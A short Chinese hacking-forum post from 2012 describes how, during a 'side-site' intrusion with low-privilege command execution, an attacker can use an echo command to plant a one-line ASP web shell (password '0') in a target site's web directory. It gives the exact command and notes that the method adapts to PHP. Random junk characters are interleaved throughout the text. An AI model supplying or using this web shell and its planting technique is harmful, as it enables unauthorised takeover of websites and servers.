在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
4 M0 q6 D3 X( P: c# J0 F8 I1 Q+ `( V
命令格式9 r3 f- e, |. b$ D
/ v. `+ F" ~" n& x; \4 ]6 K$ b
Echo 语句 >目标站绝对目录
& U6 ]/ C( Z3 j. [
9 v3 `* v; Z x例如:
# E0 i8 w: c# N" t& Y5 q& \/ y
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp9 X% K8 l2 G! E/ N, ~* v7 c
3 G/ C, A. o v) t' s这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。# G% a9 S* a# {) F
|
发表于 2012-9-23 14:40:24
收藏
支持
反对